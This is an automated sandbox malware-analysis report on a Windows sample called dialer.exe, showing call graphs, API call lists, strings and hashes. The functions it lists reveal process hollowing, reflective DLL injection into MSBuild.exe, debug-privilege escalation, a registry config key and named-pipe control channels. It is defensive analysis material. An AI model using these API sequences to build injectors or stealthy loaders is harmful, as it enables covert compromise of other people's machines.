CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                        Callgraph

                                                        Executed Functions

                                                        Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                        Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                        Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                        Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                        Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                        Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                        Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                        Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                        Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                        Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                        Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                        Non-executed Functions

                                                        Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
